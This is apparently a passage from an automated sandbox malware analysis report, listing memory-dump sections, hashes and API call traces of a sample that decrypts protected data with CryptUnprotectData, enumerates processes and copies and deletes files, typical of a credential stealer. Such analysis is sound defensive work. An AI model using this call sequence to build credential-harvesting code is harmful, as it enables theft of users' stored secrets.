                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID: wwww
                                  • API String ID: 3317088062-671953474
                                  • Opcode ID: 9a34700c6d32762f90d6b625a32934e4e73448a629d9a2d24e251656dd9c80a8
                                  • Instruction ID: 317c8caca9f877fe95b3b06391fe99553e5b1650243af71c3f24431b5fb7b1ab
                                  • Opcode Fuzzy Hash: 9a34700c6d32762f90d6b625a32934e4e73448a629d9a2d24e251656dd9c80a8
                                  • Instruction Fuzzy Hash: 14017671A00244ABCB288F58CC4AFAEBB3DEB84720F00432AF816CB3C0D7701D008AE5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: C;cp$Z+lw$b7u$dB>$zb8?
                                  • API String ID: 0-2234502678
                                  • Opcode ID: e3a2027bde2bab8c0270478f82e151174a595a7c394a42f581645c2e04c9d618
                                  • Instruction ID: 64ce2a1f1a74e86b738a6200127ac3ab09f43cb9a9d62b1979c0fc700ce81a13
                                  • Opcode Fuzzy Hash: e3a2027bde2bab8c0270478f82e151174a595a7c394a42f581645c2e04c9d618
                                  • Instruction Fuzzy Hash: 09B216B360C2049FE304AE29EC8567AFBE9EF94720F16893DE6C4C7344E63598458797
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 002D1B72
                                    • Part of subcall function 002D1820: lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D184F
                                    • Part of subcall function 002D1820: lstrlen.KERNEL32(011B7308), ref: 002D1860
                                    • Part of subcall function 002D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 002D1887
                                    • Part of subcall function 002D1820: lstrcat.KERNEL32(00000000,00000000), ref: 002D1892
                                    • Part of subcall function 002D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 002D18C1
                                    • Part of subcall function 002D1820: lstrlen.KERNEL32(002E4FA0), ref: 002D18D3
                                    • Part of subcall function 002D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 002D18F4
                                    • Part of subcall function 002D1820: lstrcat.KERNEL32(00000000,002E4FA0), ref: 002D1900
                                    • Part of subcall function 002D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 002D192F
                                  • sscanf.NTDLL ref: 002D1B9A
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 002D1BB6
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 002D1BC6
                                  • ExitProcess.KERNEL32 ref: 002D1BE3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 3040284667-0
                                  • Opcode ID: da18991eff51aaf2c928680c89c5054d5ac49df2e2ed40cf820080630d7557c4
                                  • Instruction ID: 44d9e83fbaba3d8402eefa07098b5674bd93a3e16d126abf7571ed59c430e648
                                  • Opcode Fuzzy Hash: da18991eff51aaf2c928680c89c5054d5ac49df2e2ed40cf820080630d7557c4
                                  • Instruction Fuzzy Hash: BB21E2B1518341AF8350DF69D88485BBBF9EFC8214F408A1EF599C7261E730D9188BA6
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 002B775E
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B7765
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 002B778D
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 002B77AD
                                  • LocalFree.KERNEL32(?), ref: 002B77B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 6044259af74b2383bb28ebcc14b222181bbe1e567035bc0eaeaa2ff6d3aef5aa
                                  • Instruction ID: 6df5b92e8e53110b62ee29fe30b6d194788e6351474049781ce081fa131bc64a
                                  • Opcode Fuzzy Hash: 6044259af74b2383bb28ebcc14b222181bbe1e567035bc0eaeaa2ff6d3aef5aa
                                  • Instruction Fuzzy Hash: 6B011E75B40309BBEB10DBA49C4AFEA7B78EB44B11F104155FA09EA2C1DAB0AD00CB94
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: '|n7$(@:l$IwXd$m-?${Qoo
                                  • API String ID: 0-80761592
                                  • Opcode ID: 63e1f66de1c3cf3d5083b381ce994ea8a5208202d6777e6543b0ac426c7d354c
                                  • Instruction ID: 14ed08a0155efb75ff0dd29653711d7819fa1a3fffcf1d6cb374e9727923cc96
                                  • Opcode Fuzzy Hash: 63e1f66de1c3cf3d5083b381ce994ea8a5208202d6777e6543b0ac426c7d354c
                                  • Instruction Fuzzy Hash: A292F7F390C2049FE304AE2DEC8566AF7E9EF94720F1A492DEAC4C7744E63598058796
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 7oI_$Y(oW$E~7$IJ
                                  • API String ID: 0-2242687573
                                  • Opcode ID: 2cc6f228f57f65656f2e22f9f6729796fd4611ea1dee8452213fa37f92a569cf
                                  • Instruction ID: 8d8586c3c6b668ec0b3f0bfa3a52b413cd1b5d233f478d62611a02be7a7c72e0
                                  • Opcode Fuzzy Hash: 2cc6f228f57f65656f2e22f9f6729796fd4611ea1dee8452213fa37f92a569cf
                                  • Instruction Fuzzy Hash: BD92F8F3A082109FE3046E2DEC8567AB7E9EF94720F1A893DEAC4C7744E93558058796
                                  APIs
                                    • Part of subcall function 002D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 002D71FE
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 002D3A96
                                  • Process32First.KERNEL32(00000000,00000128), ref: 002D3AA9
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 002D3ABF
                                    • Part of subcall function 002D7310: lstrlen.KERNEL32(------,002B5BEB), ref: 002D731B
                                    • Part of subcall function 002D7310: lstrcpy.KERNEL32(00000000), ref: 002D733F
                                    • Part of subcall function 002D7310: lstrcat.KERNEL32(?,------), ref: 002D7349
                                    • Part of subcall function 002D7280: lstrcpy.KERNEL32(00000000), ref: 002D72AE
                                  • CloseHandle.KERNEL32(00000000), ref: 002D3BF7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: 13d9bfd582bc46125236a91b015cb715b22e17d4ffa85ccb1de56921cab63ad5
                                  • Instruction ID: b84c2fbc8a22751a41daeff6e1098edc170aeb54a6c21611b7a00843cd4dd54c
                                  • Opcode Fuzzy Hash: 13d9bfd582bc46125236a91b015cb715b22e17d4ffa85ccb1de56921cab63ad5
                                  • Instruction Fuzzy Hash: 90810431921206CFD718CF18D888B95B7F1FB44328F29C1AAD4089B3A2D7769D92CF81
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 002BEA76
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 002BEA7E
                                  • lstrcat.KERNEL32(002DCFEC,002DCFEC), ref: 002BEB27
                                  • lstrcat.KERNEL32(002DCFEC,002DCFEC), ref: 002BEB49
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: a82d5cded1cf0883128f9776e31df46fc7305246b70e61d686d637f933049719
                                  • Instruction ID: cf3cb24d525568b86aab2530e934208f1113a249ccab21e0ce70ce77d82b3d8a
                                  • Opcode Fuzzy Hash: a82d5cded1cf0883128f9776e31df46fc7305246b70e61d686d637f933049719
                                  • Instruction Fuzzy Hash: 6F31E675A101196BDF108B58EC85FEEB77DAF44705F0040BAF90DE7281DBB05A14CBA6
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 002D40CD
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 002D40DC
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002D40E3
                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 002D4113
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptHeapString$AllocateProcess
                                  • String ID:
                                  • API String ID: 3825993179-0
                                  • Opcode ID: a6bed592b770fc1d4a542c0776f775fe4b15558d21d9bde16654a751184f0b2d
                                  • Instruction ID: 0abae1cea023fb4e621c509aca79a9fca900686e39c8b4cff8616af6bf2f2793
                                  • Opcode Fuzzy Hash: a6bed592b770fc1d4a542c0776f775fe4b15558d21d9bde16654a751184f0b2d
                                  • Instruction Fuzzy Hash: D9012C70600205BBDB14DFA5DC89BAABBADEF85311F108169FE09C7341EA71DD50CBA4
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 002B9B3B
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 002B9B4A
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 002B9B61
                                  • LocalFree.KERNEL32 ref: 002B9B70
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: 3b74b41e66b27acc30493f9454541db977cb95c81f3a4a06e0c02d120fec0dcd
                                  • Instruction ID: 3f23bc9f29cd2b824973e5ae2aabd18631cee812c5ba73e4361dd8193c867026
                                  • Opcode Fuzzy Hash: 3b74b41e66b27acc30493f9454541db977cb95c81f3a4a06e0c02d120fec0dcd
                                  • Instruction Fuzzy Hash: 51F012703503126BF7305F64AC45F967B98EF04B90F100514FA45EE2D1D7B59C50C654
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !/$MVW~$l;
                                  • API String ID: 0-4183770997
                                  • Opcode ID: 8b888a713722f011ceba54d561026405c1d32c9030bb9b893276f776bdfbcd1c
                                  • Instruction ID: cd3e8ecc50d0d9c8aaa2159e74c0962525d813c20963ac3bad349888db290d2e
                                  • Opcode Fuzzy Hash: 8b888a713722f011ceba54d561026405c1d32c9030bb9b893276f776bdfbcd1c
                                  • Instruction Fuzzy Hash: A98217F360C2049FE304AE2DEC8567AFBE9EF94320F1A853DEAC5C7744E63558058696
                                  APIs
                                  • CoCreateInstance.COMBASE(002DB110,00000000,00000001,002DB100,?), ref: 002CCB06
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 002CCB46
                                  • lstrcpyn.KERNEL32(?,?,00000104), ref: 002CCBC9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                  • String ID:
                                  • API String ID: 1940255200-0
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 002B9B9F
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 002B9BB3
                                  • LocalFree.KERNEL32(?), ref: 002B9BD7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ?q_9
                                  • API String ID: 0-3189373983
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .V
                                  • API String ID: 0-2721548884
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: a\
                                  • API String ID: 0-215104068
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 002C8636
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C866D
                                  • lstrcpy.KERNEL32(?,00000000), ref: 002C86AA
                                  • StrStrA.SHLWAPI(?,011CE088), ref: 002C86CF
                                  • lstrcpyn.KERNEL32(004E93D0,?,00000000), ref: 002C86EE
                                  • lstrlen.KERNEL32(?), ref: 002C8701
                                  • wsprintfA.USER32 ref: 002C8711
                                  • lstrcpy.KERNEL32(?,?), ref: 002C8727
                                  • StrStrA.SHLWAPI(?,011CE028), ref: 002C8754
                                  • lstrcpy.KERNEL32(?,004E93D0), ref: 002C87B4
                                  • StrStrA.SHLWAPI(?,011CE040), ref: 002C87E1
                                  • lstrcpyn.KERNEL32(004E93D0,?,00000000), ref: 002C8800
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                  • String ID: %s%s
                                  • API String ID: 2672039231-3252725368
                                  • Opcode ID: 15ba252c51e614c63dcfdf7e5fccb7e1328aec88beb8fc7bc1dd37e0b4ee8cef
                                  • Instruction ID: fcd76923d4f210acd7fe9c6b2166df0183ca496b37481c118e5c73cd22bcb2b1
                                  • Opcode Fuzzy Hash: 15ba252c51e614c63dcfdf7e5fccb7e1328aec88beb8fc7bc1dd37e0b4ee8cef
                                  • Instruction Fuzzy Hash: E7F17171910154EFDB10DF64DD88AEAB7B9EF48300F148669F909E7392DB70AE14CBA4
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B1F9F
                                  • lstrlen.KERNEL32(011C9248), ref: 002B1FAE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1FDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 002B1FE3
                                  • lstrlen.KERNEL32(002E1794), ref: 002B1FEE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B200E
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B201A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B2042
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B204D
                                  • lstrlen.KERNEL32(002E1794), ref: 002B2058
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B2075
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B2081
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B20AC
                                  • lstrlen.KERNEL32(?), ref: 002B20E4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B2104
                                  • lstrcat.KERNEL32(00000000,?), ref: 002B2112
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B2139
                                  • lstrlen.KERNEL32(002E1794), ref: 002B214B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B216B
                                  • lstrcat.KERNEL32(00000000,002E1794), ref: 002B2177
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B219D
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B21A8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B21D4
                                  • lstrlen.KERNEL32(?), ref: 002B21EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B220A
                                  • lstrcat.KERNEL32(00000000,?), ref: 002B2218
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B2242
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002B227F
                                  • lstrlen.KERNEL32(011CD688), ref: 002B228D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B22B1
                                  • lstrcat.KERNEL32(00000000,011CD688), ref: 002B22B9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B22F7
                                  • lstrcat.KERNEL32(00000000), ref: 002B2304
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B232D
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002B2356
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B2382
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002B23BF
                                  • DeleteFileA.KERNEL32(00000000), ref: 002B23F7
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 002B2444
                                  • FindClose.KERNEL32(00000000), ref: 002B2453
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                  • String ID:
                                  • API String ID: 2857443207-0
                                  • Opcode ID: feb3b3f7469182c4a3390beb503572b155211a1198fab40b72baf81abbf81a7c
                                  • Instruction ID: 27cb1237678ed759ad4d23cc3def398e43ab9599c1c58b29adff5f334d8e70ca
                                  • Opcode Fuzzy Hash: feb3b3f7469182c4a3390beb503572b155211a1198fab40b72baf81abbf81a7c
                                  • Instruction Fuzzy Hash: 78E15E31931746DBDB21EF64DD89AEE77B9AF04380F144064F849AB252DB34DD29CB90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C6445
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C6480
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 002C64AA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C64E1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6506
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C650E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C6537
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                   • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmp
